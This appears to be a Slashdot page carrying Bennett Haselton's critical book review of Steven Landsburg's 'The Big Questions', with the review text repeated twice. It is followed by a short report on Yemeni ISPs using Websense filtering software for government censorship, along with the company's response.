Those authors' books typically marshall a large amount of research data and evidence in support of a thesis that seems contrarian but turns out to be probably true. The Big Questions (released November 3rd with a companion website and blog) doesn't do that. The book is divided into many self-contained vignettes and side topics and independent arguments, which are based more on logic and reasoning than externally gathered evidence, and the arguments don't always convince you of the conclusions. But that's part of the fun: many of the arguments in the book are structured so rigorously, almost like mathematical proofs, that if you disagree with the conclusion, the challenge is to figure out why you think the conclusion is wrong. (Nobody ever scribbled equations in the margins of Malcolm Gladwell's books trying to figure out if he was "right".)
You'll probably enjoy the book the most if the following are true for you:
- You enjoyed math all the way through high school, especially the paradoxes that seemed to grow out of elementary rules of logic or probability. Sometimes the paradoxes resulted from a flaw in one of the reasoning steps, so that identifying the flaw led to a deeper understanding of how to conduct those steps. And sometimes there really is no flaw in the reasoning, so that the conclusion, no matter how counterintuitive, must be true.
- Eventually, though, you ran out of "paradoxes" that could be described in the language of intermediate mathematics. There are other paradoxes lurking in mathematics, of course (like the celebrated Banach-Tarski paradox), but most of them require you to learn so much mathematics just to understand the paradox, that there aren't enough hours in the day.
- So, you'd be delighted to discover paradoxes in an entirely new field, where arguments built from elementary rules of logic, lead to a conclusion that seems at first to make no sense, but leads to a deeper understanding the more you think about it.
The core philosophy of The Big Questions -- not embodying any of the conclusions, but rather the rules of the game by which those conclusions should be reached -- is expressed in two lines near the end:
If you're objecting to a logical argument, try asking yourself exactly which line in that argument you're objecting to. If you can't identify the locus of your disagreement, you're probably just blathering.
(This quote makes Landsburg sound grumpier than he is; at this point in the book, he's just coming off of describing an exhausting round of e-mail argument with another professor who he felt was not playing by these rules.) I've believed this passionately for a long time, and to me it seems trivially true anyway: If an argument is organized into a series of steps, and you disagree with the conclusion, then some step in the argument must be the first step you disagree with, and if the author feels like each step in their argument follows by airtight logic from the previous step, then that's the point at which one of the two players is wrong. There's nothing more exasperating to me than writing what I think is a well-reasoned logical argument, sending it to the intended audience, and getting back a reply which makes it obvious that the recipient simply read my conclusion, disagreed with it, cleared their throat, and started typing out paragraphs describing their own view. Which they're entitled to, but they missed the point -- I was hoping that if they disagreed with my argument, they could pinpoint exactly what part they disagreed with. (If they had replied with their own argument structured like a sequence of logical steps, then that would at least be a tit-for-tat exchange, but that rarely happens -- people who believe in forming their arguments like rigorous proofs, usually also like to find the error in logical arguments that lead to the opposite conclusion.)
To give you some of the flavor: One chapter in The Big Questions contains an elegant argument against protectionist tariffs: Suppose that an American sells cameras for $80 but a foreigner wants to sell cameras in America for $60 apiece. An American who would have bought the $80 camera will now buy the $60 camera and hence is better off by $20. The seller now has to sell their own cameras for $60 to stay competitive, so they are worse off by at most $20 -- however, if they voluntarily switch to some other business, then they'll be better off than they were when they were selling cameras for $60, and therefore worse off by some amount less than $20 from their original position. So on balance, abolishing protectionist tariffs would be good for Americans. "Therefore," writes Landsburg, "it seems to me that the protectionist's position is even less respectable than the creationist's. If you're convinced that most scientists are liars -- that everything they say about fossils, for example, is false -- then you can be a logically consistent creationist. But you can't be a logically consistent protectionist."
But the best part of reading an argument like that is to try and come up with a counter-argument that is equally rigorous. I think Landsburg is right, but only insofar as it applies to benefits to Americans. That leaves out another part of the equation: whether the production of cheaper foreign goods is harmful to foreigners providing the cheap labor. The textbook answer from economic theory is that the factory jobs must make workers better off (or at least no worse off) than they were before, otherwise they wouldn't have taken the jobs voluntarily. On the other hand, conditions in overseas sweatshops are so notoriously dangerous and unpleasant that it seems hard to believe the opportunities leave workers better off on balance. So you could be a logically consistent protectionist if you believe that: (a) sweatshop workers systematically underestimate how much the factory jobs are harming them; and (b) the harm done to the workers outweighs the benefits of lower prices for Americans. I'm not sure if these statements are true, but they are logically consistent. Still, Landsburg's argument is about as concise as possible and seems to refute any argument that protectionism makes Americans better off on average.
In another chapter, Landsburg discusses the recent atheist bestsellers such as Richard Dawkins's The God Delusion and suggests that these books are really directed against a non-existent enemy, because the evidence is quite strong that most adults do not really believe the tenets of any major religion anyway. There is the argument that "interfaith dialog" makes no sense if you really believe (as many major religions teach) that your own religion's tenets are settled beyond discussion. There is the argument that since economic theory consistently shows that people respond to threat of punishment, virtually no one behaves as if they actually believe in everlasting damnation after death as punishment for sin. And the fact that the voluntary martyrdom of suicide bombers is vastly more rare than most people believe, and a disproportionate number of those are children (as Landsburg says, "I do not deny that many children believe in God, just as I do not deny that many children believe in Santa Claus"). I'd wondered before about how many people really did believe in God, but in just a few pages this argument had me thinking that the number was a lot lower than I'd ever thought before.
On the other hand, there were some arguments that I didn't spend much time puzzling over at all. Landsburg summarizes the paradox of "free will", and his dismissal of the paradox, basically as follows: The interactions of atoms that make up our brains and our environments, are deterministic processes, so if you know the state of a system at a given point in time, you could predict the state at any future point in time if you had enough computational power (with a caveat about the randomness possibly introduced by quantum physics). "Where, then, is there room for free will?... Easy: There is room for free will on Tuesday, Wednesday, Thursday and Friday, as the human being in question engages in deliberations that ultimately cause his actions." He says that just as "weather" is shorthand for the aggregate of the interactions of trillions of water molecules, "free will" is the same kind of shorthand:
"What caused your decision to get drunk and watch Mystery Science Theater the night before your philosophy final? Free will. An insane person might object that free will can't be it at all, because free will is just a shorthand term for an indescribably complex process involving trillions of neurons, which in turn can be described in terms of quadrillions of atoms and quintillions of subatomic particles. So what? You still have free will, and you know it."
I wrote Landsburg to object that this misses what people really mean by "free will" -- it's not just a shorthand term for the aggregate of particle interactions that make up human choices. It means, very specifically, that you could possibly have done something other than what you did. Landsburg replied to this objection by e-mail: "I dispute that there is any way to make sense of a phrase like 'could possibly have done something else'. I know what it means to say you did something; spacetime consists of all the things that get done; it is what it is." And I agree; it's hard to pin down what the statement means. But it underlies all of our instincts and intuition about human choices and blame: "You could have called yesterday, but you didn't." "I should have studied harder last night." If determinism is true, then these statements make no sense, and therein lies what I think most people mean when they refer to the paradox of determinism vs. free will. I think the issue deserves more thought than it's given in the book.
This is followed by a passage arguing that the controversy over "ESP" is silly, because of course everyone knows certain things by "extra-sensory perception", if by that you mean "things perceived not through the senses" -- like mathematical truths, which are arrived at through thought and not sensory input. Writes Landsburg: "Some of those phenomena have one additional characteristic: They are physically impossible. But if you're going to define ESP by its impossibility, then of course there's no point in debating it... And if impossibility is not a criterion, then mathematical insight is as good an example of ESP -- in the everyday sense of the term -- as any instance of clairvoyance or telepathy." Actually, I think the everyday use of the word "ESP" refers to perceiving facts that do not logically have to be true (so mathematical facts are excluded) -- like "Someone is watching me right now" -- without sensory input. And, once you clarify the definition, most people agree there's no evidence for it, so the whole discussion seems uninteresting.
But even if you throw out 75% of the book's arguments (which is far more than I rejected), you should still enjoy puzzling through the remaining 25% and forming your own conclusions. The most interesting argument in the book, to me, is about how to properly answer the question: How much should the government be willing to spend, to save the life of one of its citizens? Of course if you're Ayn Rand, the answer is zero, but if you want to answer the question according to the laws of economic efficiency, it's a tough one. Landsburg originally got into the debate by writing a column arguing that ventilator support was not the most efficient way to help the poor. (Unfortunately, he couched it in the language of "ventilator insurance", which I think clouded the issue. I think it would have been more clear to say: "If we're going to spend this money to help the poor at all, it would make more sense to spend it on groceries for a far larger number of people, than to spend it on ventilator support for one person.") Another more liberal economist, Robert Frank, responded with a New York Times editorial arguing with Landsburg's methods and coming up with his own reasoning. I think there are problems with the reasoning on both sides (not logical errors, but rather situations in which the rules that they have adopted, lead to paradoxes and untenable positions -- suggesting that both sides' axioms have to be thrown out), but I still don't know the answer. (My own opinion about the flaws in their logic, and an alternative answer, is at this link: "How much should government spend to save a single life?")
The Big Questions also has excursions into areas of science and mathematics that I had never fully understood before, and in some cases hadn't even thought about. Landsburg describes how he had first learned that colors could be arranged continuously into a color wheel, and later learned that they could be arranged continuously along a line according to their wavelengths, and then a friend pointed out the contradiction. Which is it? Do colors vary continuously in two dimensions (forming a wheel) or one (forming a line)? Or, wait a minute, we measure colors according to the strength of their red, green, and blue components, so don't they vary continuously in three dimensions? Well, the answer is in there.
There are also chapters on Heisenberg's uncertainty principle, Gödel's incompleteness theorem, and the quantum phenomenon of "spooky action at a distance", which explain all of the concepts more clearly than I'd ever heard them explained anywhere else. I think that most writers attempting to explain these concepts err either on the side of being too precise -- determined that everything they write be correct, with no regard for whether the reader grasps it or not -- or too vague -- giving the general air of mystery, but not explaining the rules governing how a phenomenon works, and how to work with those rules to derive other conclusions from them. Landsburg's chapter simply begins, "This chapter is full of lies. That's because I'll be explaining the foundations of quantum mechanics, and I assume that if you wanted a careful accounting of every detail, you'd be reading a textbook." The text then gives an example of considering an electron that moves in a conceptual "circle", where at some points on the circle it has a greater probability of manifesting itself in one location if you examine it, and at other points it has a greater probability of manifesting itself in another location. He uses this to dispel a common misconception about the uncertainty principle:
You're just idly wondering where the electron is. In most circumstances, quantum mechanics says that it's quite impossible for you to know the answer to that question.
Aha! A fundamental limitation on human knowledge, no? No. Here's why: Most of the time, the electron is nowhere. Asking "Where is the electron?" is akin to asking "What is the electron's favorite movie?". It's a nonsense question. The inability to answer nonsense questions is not a fundamental limitation on knowledge.
How can the electron be nowhere? Because electrons behave nothing at all like anything you're familiar with. Instead of a location, the electron has a quantum state.
This clarified something for me that had bugged me for years. I never took a course in quantum physics, but I had indeed always assumed that electrons did have a "location" and the uncertainty principle referred to a limit on our ability to determine that location. Unfortunately there are probably many people who get through an entire course in quantum physics without getting this cleared up.
Balanced against these valuable insights are some libertarian arguments that are probably nothing you haven't heard before, especially if you have read one of Landsburg's earlier books, Fair Play -- subtitled "What your child can teach you about economics, values, and the meaning of life", although the book was clearly about what he was teaching to his daughter. Many reviewers of Fair Play took note of passages like this one:
Most people have instinctive sympathy for the man who says "I tried for months to get a job and nobody would hire me. Only in desperation did I turn to theft." The same people have only scorn for the man who says "I tried for months to get a date and nobody would go out with me. Only in desperation did I turn to rape."
While I think most rape victims would have some choice words about the comparison, I was more unpersuaded because the passage wasn't structured like a true argument. In a good argument -- like Landsburg's earlier argument against protectionist tariffs -- you start with premises that seem apparently true, proceed by steps that seem apparently valid, and end with a conclusion that may not have been obvious from the outset. But in this case, the premise is the argument -- either you think rape and theft are comparable, or you don't. I don't think they are, because (a) the harm to a rape victim is out of proportion to the "benefit" to the rapist, and (b) notwithstanding the claims of college males, you won't actually die without sex. (Just as a thought experiment, if you would die without sex, and a man hadn't been able to get any women to sleep with him, and the government didn't provide any sort of sex "safety net", more people probably would feel sympathy for the rapist, if he only did it to save his own life.)
Some passages in The Big Questions are recycled from Fair Play and require a (just) slightly more thoughtful rebuttal. Landsburg argues that most parents, deep down, must not believe in redistributive taxation because
"I have never, ever, heard a parent say to a child that it's okay to forcibly take toys away from other children who have more toys than you do. Nor have I ever heard a parent tell a child that if one kid has more toys than the others, then it's okay for those others to form a 'government' and vote to take those toys away."
OK, but... I have also never heard a parent tell their child that it was OK to build a "jail" and put other kids in that "jail" for wrongdoing. And yet almost everyone, even libertarians, supports some form of imprisonment for lawbreakers. The lesson here is that there are some powers that are appropriate to delegate to a democratically elected government, with all the right checks and balances, but that you don't want random vigilantes seizing for themselves. So if you want a principled argument against taxation, it would take more than that.
And other passages in Fair Play deservedly did not make the cut of being imported into The Big Questions:
The massacre at Waco took place only days after my daughter (then aged six) had asked me how the government uses our tax dollars. When she walked in on the television coverage of flames and carnage, I told her that now she was seeing the answer to her question. And when she heard that there were children in there, that they were burning children, her eyes grew wide with horror, and I both hope and believe that she will never forget that moment.
If you want 230 pages of that, then Fair Play is the book for you!
Of the libertarian arguments that did get carried over into The Big Questions, I think the problem with most of them is not that I think the conclusion is wrong, but, again, that the whole argument is the premise, and if you disagree with the premise then there's nothing to think about. For example:
Bert wants to hire an office manager and Ernie wants to manage an office. The law allows Ernie to refuse any job for any reason. If he doesn't like Albanians, he doesn't have to work for one. Bert is held to a higher standard: If he lets it be known that no Albanians need apply, he'd better have a damned good lawyer.
These asymmetries grate against the most fundamental requirement of fairness -- that people should be treated equally, in the sense that their rights and responsibilities should not change because of irrelevant external circumstances.
But I think the laws do treat all people equally, because they apply equally whether Bert is discriminating in deciding whether to hire Ernie, or whether Ernie is discriminating in deciding whether to hire Bert. The laws don't apply equally to all roles that people play, which is the distinction that Landsburg is highlighting -- but laws never apply equally to different roles, since roles are defined by what we do, and what is the point of laws, except to draw distinctions based on behaviors? So there may be some other argument against anti-discrimination laws, but "symmetry" by itself wouldn't be enough.
A footnote in this chapter of The Big Questions says, "Portions of this chapter are adapted from my earlier book Fair Play." In the margin where I'd been scribbling all of my notes and equations and counterarguments, I wrote, "That's what's wrong with it!"
And yet, as I said, I would probably have paid up to about $200 for the book, based on how much I enjoyed the parts that I did like. At one point Landsburg praises an insight from Daniel Dennett and Douglas Hofstadter and adds, "You should read all their books." Yes, and all of Richard Dawkins's and Malcolm Gladwell's and Steven Pinker's and Dubner's and Levitt's books, for starters. Landsburg himself would probably agree that it's more important to read those books, than this one. But there's time in your life to read The Big Questions as well. It's even structured so you can consume it in bite-sized portions while taking a break from working your way through those other books -- which are, in truth, more valuable, but not as much fun.
You can purchase The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
-
The Big Questions
Frequent Slashdot contributor Bennett Haselton changes things up today by reviewing The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics. Questions that big need a big review and you can learn what Bennett has to say about it all by reading below.
The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics
Author: Steven E. Landsburg
Pages: 288
Publisher: Free Press
Rating: 8/10
Reviewer: Bennett Haselton
ISBN: 978-1439148211
Summary: Steven Landsburg uses concepts from mathematics, economics, and physics to address the big questions in philosophy
The first thing that I have to admit as a reviewer is that I enjoyed the book so much -- not just reading it, but scribbling out pages of scratch paper working on the puzzles inspired by the book -- that I probably would have paid up to about $200 for it (despite the fact that I disagreed with many of the conclusions, and even thought some of the arguments were pretty weak). I certainly don't mean that it's better than books by Richard Dawkins, Daniel Dennett, Steven Pinker, Malcolm Gladwell, or Steven Levitt and Steven Dubner (the Freakonomics and SuperFreakonomics team), but it will appeal to many of the same people.
Those authors' books typically marshall a large amount of research data and evidence in support of a thesis that seems contrarian but turns out to be probably true. The Big Questions (released November 3rd with a companion website and blog) doesn't do that. The book is divided into many self-contained vignettes and side topics and independent arguments, which are based more on logic and reasoning than externally gathered evidence, and the arguments don't always convince you of the conclusions. But that's part of the fun: many of the arguments in the book are structured so rigorously, almost like mathematical proofs, that if you disagree with the conclusion, the challenge is to figure out why you think the conclusion is wrong. (Nobody ever scribbled equations in the margins of Malcolm Gladwell's books trying to figure out if he was "right".)
You'll probably enjoy the book the most if the following are true for you:
- You enjoyed math all the way through high school, especially the paradoxes that seemed to grow out of elementary rules of logic or probability. Sometimes the paradoxes resulted from a flaw in one of the reasoning steps, so that identifying the flaw led to a deeper understanding of how to conduct those steps. And sometimes there really is no flaw in the reasoning, so that the conclusion, no matter how counterintuitive, must be true.
- Eventually, though, you ran out of "paradoxes" that could be described in the language of intermediate mathematics. There are other paradoxes lurking in mathematics, of course (like the celebrated Banach-Tarski paradox), but most of them require you to learn so much mathematics just to understand the paradox, that there aren't enough hours in the day.
- So, you'd be delighted to discover paradoxes in an entirely new field, where arguments built from elementary rules of logic, lead to a conclusion that seems at first to make no sense, but leads to a deeper understanding the more you think about it.
The core philosophy of The Big Questions -- not embodying any of the conclusions, but rather the rules of the game by which those conclusions should be reached -- is expressed in two lines near the end:
If you're objecting to a logical argument, try asking yourself exactly which line in that argument you're objecting to. If you can't identify the locus of your disagreement, you're probably just blathering.
(This quote makes Landsburg sound grumpier than he is; at this point in the book, he's just coming off of describing an exhausting round of e-mail argument with another professor who he felt was not playing by these rules.) I've believed this passionately for a long time, and to me it seems trivially true anyway: If an argument is organized into a series of steps, and you disagree with the conclusion, then some step in the argument must be the first step you disagree with, and if the author feels like each step in their argument follows by airtight logic from the previous step, then that's the point at which one of the two players is wrong. There's nothing more exasperating to me than writing what I think is a well-reasoned logical argument, sending it to the intended audience, and getting back a reply which makes it obvious that the recipient simply read my conclusion, disagreed with it, cleared their throat, and started typing out paragraphs describing their own view. Which they're entitled to, but they missed the point -- I was hoping that if they disagreed with my argument, they could pinpoint exactly what part they disagreed with. (If they had replied with their own argument structured like a sequence of logical steps, then that would at least be a tit-for-tat exchange, but that rarely happens -- people who believe in forming their arguments like rigorous proofs, usually also like to find the error in logical arguments that lead to the opposite conclusion.)
To give you some of the flavor: One chapter in The Big Questions contains an elegant argument against protectionist tariffs: Suppose that an American sells cameras for $80 but a foreigner wants to sell cameras in America for $60 apiece. An American who would have bought the $80 camera will now buy the $60 camera and hence is better off by $20. The seller now has to sell their own cameras for $60 to stay competitive, so they are worse off by at most $20 -- however, if they voluntarily switch to some other business, then they'll be better off than they were when they were selling cameras for $60, and therefore worse off by some amount less than $20 from their original position. So on balance, abolishing protectionist tariffs would be good for Americans. "Therefore," writes Landsburg, "it seems to me that the protectionist's position is even less respectable than the creationist's. If you're convinced that most scientists are liars -- that everything they say about fossils, for example, is false -- then you can be a logically consistent creationist. But you can't be a logically consistent protectionist."
But the best part of reading an argument like that is to try and come up with a counter-argument that is equally rigorous. I think Landsburg is right, but only insofar as it applies to benefits to Americans. That leaves out another part of the equation: whether the production of cheaper foreign goods is harmful to foreigners providing the cheap labor. The textbook answer from economic theory is that the factory jobs must make workers better off (or at least no worse off) than they were before, otherwise they wouldn't have taken the jobs voluntarily. On the other hand, conditions in overseas sweatshops are so notoriously dangerous and unpleasant that it seems hard to believe the opportunities leave workers better off on balance. So you could be a logically consistent protectionist if you believe that: (a) sweatshop workers systematically underestimate how much the factory jobs are harming them; and (b) the harm done to the workers outweighs the benefits of lower prices for Americans. I'm not sure if these statements are true, but they are logically consistent. Still, Landsburg's argument is about as concise as possible and seems to refute any argument that protectionism makes Americans better off on average.
In another chapter, Landsburg discusses the recent atheist bestsellers such as Richard Dawkins's The God Delusion and suggests that these books are really directed against a non-existent enemy, because the evidence is quite strong that most adults do not really believe the tenets of any major religion anyway. There is the argument that "interfaith dialog" makes no sense if you really believe (as many major religions teach) that your own religion's tenets are settled beyond discussion. There is the argument that since economic theory consistently shows that people respond to threat of punishment, virtually no one behaves as if they actually believe in everlasting damnation after death as punishment for sin. And the fact that the voluntary martyrdom of suicide bombers is vastly more rare than most people believe, and a disproportionate number of those are children (as Landsburg says, "I do not deny that many children believe in God, just as I do not deny that many children believe in Santa Claus"). I'd wondered before about how many people really did believe in God, but in just a few pages this argument had me thinking that the number was a lot lower than I'd ever thought before.
On the other hand, there were some arguments that I didn't spend much time puzzling over at all. Landsburg summarizes the paradox of "free will", and his dismissal of the paradox, basically as follows: The interactions of atoms that make up our brains and our environments, are deterministic processes, so if you know the state of a system at a given point in time, you could predict the state at any future point in time if you had enough computational power (with a caveat about the randomness possibly introduced by quantum physics). "Where, then, is there room for free will?... Easy: There is room for free will on Tuesday, Wednesday, Thursday and Friday, as the human being in question engages in deliberations that ultimately cause his actions." He says that just as "weather" is shorthand for the aggregate of the interactions of trillions of water molecules, "free will" is the same kind of shorthand:
"What caused your decision to get drunk and watch Mystery Science Theater the night before your philosophy final? Free will. An insane person might object that free will can't be it at all, because free will is just a shorthand term for an indescribably complex process involving trillions of neurons, which in turn can be described in terms of quadrillions of atoms and quintillions of subatomic particles. So what? You still have free will, and you know it."
I wrote Landsburg to object that this misses what people really mean by "free will" -- it's not just a shorthand term for the aggregate of particle interactions that make up human choices. It means, very specifically, that you could possibly have done something other than what you did. Landsburg replied to this objection by e-mail: "I dispute that there is any way to make sense of a phrase like 'could possibly have done something else'. I know what it means to say you did something; spacetime consists of all the things that get done; it is what it is." And I agree; it's hard to pin down what the statement means. But it underlies all of our instincts and intuition about human choices and blame: "You could have called yesterday, but you didn't." "I should have studied harder last night." If determinism is true, then these statements make no sense, and therein lies what I think most people mean when they refer to the paradox of determinism vs. free will. I think the issue deserves more thought than it's given in the book.
This is followed by a passage arguing that the controversy over "ESP" is silly, because of course everyone knows certain things by "extra-sensory perception", if by that you mean "things perceived not through the senses" -- like mathematical truths, which are arrived at through thought and not sensory input. Writes Landsburg: "Some of those phenomena have one additional characteristic: They are physically impossible. But if you're going to define ESP by its impossibility, then of course there's no point in debating it... And if impossibility is not a criterion, then mathematical insight is as good an example of ESP -- in the everyday sense of the term -- as any instance of clairvoyance or telepathy." Actually, I think the everyday use of the word "ESP" refers to perceiving facts that do not logically have to be true (so mathematical facts are excluded) -- like "Someone is watching me right now" -- without sensory input. And, once you clarify the definition, most people agree there's no evidence for it, so the whole discussion seems uninteresting.
But even if you throw out 75% of the book's arguments (which is far more than I rejected), you should still enjoy puzzling through the remaining 25% and forming your own conclusions. The most interesting argument in the book, to me, is about how to properly answer the question: How much should the government be willing to spend, to save the life of one of its citizens? Of course if you're Ayn Rand, the answer is zero, but if you want to answer the question according to the laws of economic efficiency, it's a tough one. Landsburg originally got into the debate by writing a column arguing that ventilator support was not the most efficient way to help the poor. (Unfortunately, he couched it in the language of "ventilator insurance", which I think clouded the issue. I think it would have been more clear to say: "If we're going to spend this money to help the poor at all, it would make more sense to spend it on groceries for a far larger number of people, than to spend it on ventilator support for one person.") Another more liberal economist, Robert Frank, responded with a New York Times editorial arguing with Landsburg's methods and coming up with his own reasoning. I think there are problems with the reasoning on both sides (not logical errors, but rather situations in which the rules that they have adopted, lead to paradoxes and untenable positions -- suggesting that both sides' axioms have to be thrown out), but I still don't know the answer. (My own opinion about the flaws in their logic, and an alternative answer, is at this link: "How much should government spend to save a single life?")
The Big Questions also has excursions into areas of science and mathematics that I had never fully understood before, and in some cases hadn't even thought about. Landsburg describes how he had first learned that colors could be arranged continuously into a color wheel, and later learned that they could be arranged continuously along a line according to their wavelengths, and then a friend pointed out the contradiction. Which is it? Do colors vary continuously in two dimensions (forming a wheel) or one (forming a line)? Or, wait a minute, we measure colors according to the strength of their red, green, and blue components, so don't they vary continuously in three dimensions? Well, the answer is in there.
There are also chapters on Heisenberg's uncertainty principle, Gödel's incompleteness theorem, and the quantum phenomenon of "spooky action at a distance", which explain all of the concepts more clearly than I'd ever heard them explained anywhere else. I think that most writers attempting to explain these concepts err either on the side of being too precise -- determined that everything they write be correct, with no regard for whether the reader grasps it or not -- or too vague -- giving the general air of mystery, but not explaining the rules governing how a phenomenon works, and how to work with those rules to derive other conclusions from them. Landsburg's chapter simply begins, "This chapter is full of lies. That's because I'll be explaining the foundations of quantum mechanics, and I assume that if you wanted a careful accounting of every detail, you'd be reading a textbook." The text then gives an example of considering an electron that moves in a conceptual "circle", where at some points on the circle it has a greater probability of manifesting itself in one location if you examine it, and at other points it has a greater probability of manifesting itself in another location. He uses this to dispel a common misconception about the uncertainty principle:
You're just idly wondering where the electron is. In most circumstances, quantum mechanics says that it's quite impossible for you to know the answer to that question.
Aha! A fundamental limitation on human knowledge, no? No. Here's why: Most of the time, the electron is nowhere. Asking "Where is the electron?" is akin to asking "What is the electron's favorite movie?". It's a nonsense question. The inability to answer nonsense questions is not a fundamental limitation on knowledge.
How can the electron be nowhere? Because electrons behave nothing at all like anything you're familiar with. Instead of a location, the electron has a quantum state.
This clarified something for me that had bugged me for years. I never took a course in quantum physics, but I had indeed always assumed that electrons did have a "location" and the uncertainty principle referred to a limit on our ability to determine that location. Unfortunately there are probably many people who get through an entire course in quantum physics without getting this cleared up.
Balanced against these valuable insights are some libertarian arguments that are probably nothing you haven't heard before, especially if you have read one of Landsburg's earlier books, Fair Play -- subtitled "What your child can teach you about economics, values, and the meaning of life", although the book was clearly about what he was teaching to his daughter. Many reviewers of Fair Play took note of passages like this one:
Most people have instinctive sympathy for the man who says "I tried for months to get a job and nobody would hire me. Only in desperation did I turn to theft." The same people have only scorn for the man who says "I tried for months to get a date and nobody would go out with me. Only in desperation did I turn to rape."
While I think most rape victims would have some choice words about the comparison, I was more unpersuaded because the passage wasn't structured like a true argument. In a good argument -- like Landsburg's earlier argument against protectionist tariffs -- you start with premises that seem apparently true, proceed by steps that seem apparently valid, and end with a conclusion that may not have been obvious from the outset. But in this case, the premise is the argument -- either you think rape and theft are comparable, or you don't. I don't think they are, because (a) the harm to a rape victim is out of proportion to the "benefit" to the rapist, and (b) notwithstanding the claims of college males, you won't actually die without sex. (Just as a thought experiment, if you would die without sex, and a man hadn't been able to get any women to sleep with him, and the government didn't provide any sort of sex "safety net", more people probably would feel sympathy for the rapist, if he only did it to save his own life.)
Some passages in The Big Questions are recycled from Fair Play and require a (just) slightly more thoughtful rebuttal. Landsburg argues that most parents, deep down, must not believe in redistributive taxation because
"I have never, ever, heard a parent say to a child that it's okay to forcibly take toys away from other children who have more toys than you do. Nor have I ever heard a parent tell a child that if one kid has more toys than the others, then it's okay for those others to form a 'government' and vote to take those toys away."
OK, but... I have also never heard a parent tell their child that it was OK to build a "jail" and put other kids in that "jail" for wrongdoing. And yet almost everyone, even libertarians, supports some form of imprisonment for lawbreakers. The lesson here is that there are some powers that are appropriate to delegate to a democratically elected government, with all the right checks and balances, but that you don't want random vigilantes seizing for themselves. So if you want a principled argument against taxation, it would take more than that.
And other passages in Fair Play deservedly did not make the cut of being imported into The Big Questions:
The massacre at Waco took place only days after my daughter (then aged six) had asked me how the government uses our tax dollars. When she walked in on the television coverage of flames and carnage, I told her that now she was seeing the answer to her question. And when she heard that there were children in there, that they were burning children, her eyes grew wide with horror, and I both hope and believe that she will never forget that moment.
If you want 230 pages of that, then Fair Play is the book for you!
Of the libertarian arguments that did get carried over into The Big Questions, I think the problem with most of them is not that I think the conclusion is wrong, but, again, that the whole argument is the premise, and if you disagree with the premise then there's nothing to think about. For example:
Bert wants to hire an office manager and Ernie wants to manage an office. The law allows Ernie to refuse any job for any reason. If he doesn't like Albanians, he doesn't have to work for one. Bert is held to a higher standard: If he lets it be known that no Albanians need apply, he'd better have a damned good lawyer.
These asymmetries grate against the most fundamental requirement of fairness -- that people should be treated equally, in the sense that their rights and responsibilities should not change because of irrelevant external circumstances.
But I think the laws do treat all people equally, because they apply equally whether Bert is discriminating in deciding whether to hire Ernie, or whether Ernie is discriminating in deciding whether to hire Bert. The laws don't apply equally to all roles that people play, which is the distinction that Landsburg is highlighting -- but laws never apply equally to different roles, since roles are defined by what we do, and what is the point of laws, except to draw distinctions based on behaviors? So there may be some other argument against anti-discrimination laws, but "symmetry" by itself wouldn't be enough.
A footnote in this chapter of The Big Questions says, "Portions of this chapter are adapted from my earlier book Fair Play." In the margin where I'd been scribbling all of my notes and equations and counterarguments, I wrote, "That's what's wrong with it!"
And yet, as I said, I would probably have paid up to about $200 for the book, based on how much I enjoyed the parts that I did like. At one point Landsburg praises an insight from Daniel Dennett and Douglas Hofstadter and adds, "You should read all their books." Yes, and all of Richard Dawkins's and Malcolm Gladwell's and Steven Pinker's and Dubner's and Levitt's books, for starters. Landsburg himself would probably agree that it's more important to read those books, than this one. But there's time in your life to read The Big Questions as well. It's even structured so you can consume it in bite-sized portions while taking a break from working your way through those other books -- which are, in truth, more valuable, but not as much fun.
You can purchase The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
-
Yemenis Should Be Incensed At Websense
Slashdot regular Bennett Haselton writes "Websense, a US-based Internet-censoring software maker, claims not to sell to foreign governments that are censoring Internet access for all of their citizens. But the OpenNet Initiative reports that national ISPs in Yemen have been using Websense to filter Internet access for at least the past four years. Will Websense revoke their license? And what would happen then?"
Update: 08/10 21:01 GMT by KD : Bennett adds, "After the story ran, Websense sent me this update." "Since we were informed about the potential use of our products by Yemeni ISPs based on government-imposed Internet restrictions in Yemen, we have investigated this potential non-compliance with our anti-censorship policy. Because our product operates based on a database system, we are able to block updated database downloads to locations and to end users where the use of our product would violate law or our corporate policies. We believe that we have identified the specific product subscriptions that are being used for Web filtering by ISPs in Yemen, and in accordance with our policy against government-imposed censorship, we have taken action to discontinue the database downloads to the Yemeni ISPs."
The Internet censoring software maker Websense has a published policy on their website against allowing their software to be used for government-mandated censorship:
Websense does not sell to governments or Internet Service Providers (ISPs) that are engaged in any sort of government-imposed censorship. Any government-mandated censorship projects will not be engaged by Websense. If Websense does win a business and later discovers that the government is requiring all of its national ISPs to engage in censorship of the Web and Web content, we will remove our technology and capabilities from the project.
This supposedly differentiates the company from competitors such as Smartfilter (now owned by McAfee), which according to OpenNet Initiative reports, is used to censor the Internet in several African and Middle Eastern countries including Tunisia, Saudi Arabia, UAE, and Sudan. Websense once enthusiastically competed for the contract to censor Internet access in Saudi Arabia, but has now apparently ceded such markets to Smartfilter.
However, according to the ONI, the two national ISPs in the country of Yemen are using Websense to censor Internet access for all users. The researchers found that some sites are blocked in Yemen that are probably not on Websense's original filtering list, such as the Yemeni Socialist Party, as well as sites that are blocked under standard Websense categories, such as pornography, sex education materials, and "anonymizing and privacy tools" (presumably, proxy sites).
Websense declined to tell me whether they have ever revoked an ISP's license to use Websense after discovering that the ISP was using it in violation of their anti-government-censorship policy. They also declined to say whether they had any ISP customers in Middle Eastern countries, apart from Yemen. (For any Middle Eastern ISP using Websense, there's a high probability that they would be doing it as a result of a government mandated filtering policy, and hence in violation of Websense's stated rules.) But regarding the use of Websense in Yemen, Websense did reply to say simply, "We will look into the matter. If our software is being used in violation of our policy, we will take appropriate action." I think that if they were serious about preventing their software from being used for government censorship, they should have red-flagged any purchase from a national ISP in a country with one of the worst press-freedom ratings in the world, but better late than never.
